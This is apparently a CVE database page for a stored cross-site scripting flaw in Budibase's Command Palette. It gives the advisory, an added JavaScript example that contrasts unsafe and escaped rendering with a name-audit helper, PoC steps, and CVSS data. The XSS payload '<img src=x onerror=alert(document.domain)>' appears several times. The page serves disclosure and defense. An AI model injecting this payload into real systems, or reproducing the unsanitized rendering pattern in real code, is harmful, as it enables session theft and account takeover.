Security Vulnerability Report
CVE-2026-35218 CVSS 8.7 HIGH

CVE-2026-35218

Published: 2026-04-03 16:16:42
Last Modified: 2026-04-08 21:18:49

Description

Budibase is an open-source low-code platform. Prior to version 3.32.5, Budibase's Builder Command Palette renders entity names (tables, views, queries, automations) using Svelte's {@html} directive without any sanitization. An authenticated user with Builder access can create a table, automation, view, or query whose name contains an HTML payload (e.g. <img src=x onerror=alert(document.domain)>). When any Builder-role user in the same workspace opens the Command Palette (Ctrl+K), the payload executes in their browser, stealing their session cookie and enabling full account takeover. This issue has been patched in version 3.32.5.
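The root cause described above is a rendering choice, not a data-validation one: a Svelte {@html name} expression inserts the stored entity name as raw markup, whereas a plain {name} expression escapes it. The added example below (written for this report, not Budibase's own code) contrasts the two patterns in plain JavaScript and includes a small audit helper a defender can run over existing table, view, query and automation names before upgrading to 3.32.5. The sample names are constructed; the payload is the one quoted in the description.

```javascript
// Added example, not Budibase code. Contrasts raw-HTML rendering (what
// Svelte's {@html} does) with escaped text rendering, plus an audit helper
// for stored entity names. Sample names are constructed.

const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

// Escape the five characters that can change HTML or attribute context.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable pattern: the stored name is concatenated straight into markup,
// which is exactly what `{@html name}` amounts to. Any tag in the name is
// parsed and, for an <img onerror=...>, its handler runs in the viewer's session.
function renderPaletteItemUnsafe(name) {
  return `<li class="palette-item">${name}</li>`;
}

// Hardened pattern: escape first, so attacker-supplied tags become inert text.
// In Svelte this is the default behaviour of `{name}`; {@html} opts out of it.
function renderPaletteItemSafe(name) {
  return `<li class="palette-item">${escapeHtml(name)}</li>`;
}

// Heuristic audit check (assumption: a name should never need markup):
// flags names that open a tag or carry an inline event-handler attribute.
function looksLikeMarkup(name) {
  return /<\s*[a-z!\/]/i.test(name) || /on\w+\s*=/i.test(name);
}

// Returns the subset of stored entity names worth reviewing.
function auditEntityNames(names) {
  return names.filter(looksLikeMarkup);
}

// Constructed sample entity names, including the payload from the advisory.
const SAMPLE_NAMES = [
  "Customers",
  "Orders (2026)",
  "<img src=x onerror=alert(document.domain)>",
];
```

The audit helper is a triage aid only; the fix is upgrading to 3.32.5 (or, in your own Svelte code, never passing user-controlled strings through {@html}).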

CVSS Details

CVSS Score
8.7
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:budibase:budibase:*:*:*:*:*:*:*:* - VULNERABLE
Budibase < 3.32.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- PoC for CVE-2026-35218
  1. Login to Budibase as a user with Builder access.
  2. Navigate to create a new Table or Automation.
  3. In the 'Name' field, enter the following payload: -->
<img src=x onerror=alert(document.domain)>
<!-- 4. Save the entity.
  5. Open the Command Palette using Ctrl+K.
  6. The JavaScript alert will execute, demonstrating the XSS vulnerability. -->

References

https://github.com/Budibase/budibase/commit/c9ccf0c19e5849f1bda96401aa33f97c99cd8cd6 (Patch)
https://github.com/Budibase/budibase/pull/18243 (Issue Tracking, Patch)
https://github.com/Budibase/budibase/releases/tag/3.32.5 (Product, Release Notes)
https://github.com/Budibase/budibase/security/advisories/GHSA-gp5x-2v54-v2q5 (Exploit, Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-35218", "sourceIdentifier": "[email protected]", "published": "2026-04-03T16:16:41.977", "lastModified": "2026-04-08T21:18:49.067", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Budibase is an open-source low-code platform. Prior to version 3.32.5, Budibase's Builder Command Palette renders entity names (tables, views, queries, automations) using Svelte's {@html} directive without any sanitization. An authenticated user with Builder access can create a table, automation, view, or query whose name contains an HTML payload (e.g. <img src=x onerror=alert(document.domain)>). When any Builder-role user in the same workspace opens the Command Palette (Ctrl+K), the payload executes in their browser, stealing their session cookie and enabling full account takeover. This issue has been patched in version 3.32.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 5.8}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:budibase:budibase:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.32.5", "matchCriteriaId": "500AAF3C-F561-4FCA-BC90-A6E771514C5D"}]}]}], "references": [{"url": "https://github.com/Budibase/budibase/commit/c9ccf0c19e5849f1bda96401aa33f97c99cd8cd6", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/Budibase/budibase/pull/18243", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/Budibase/budibase/releases/tag/3.32.5", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/Budibase/budibase/security/advisories/GHSA-gp5x-2v54-v2q5", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}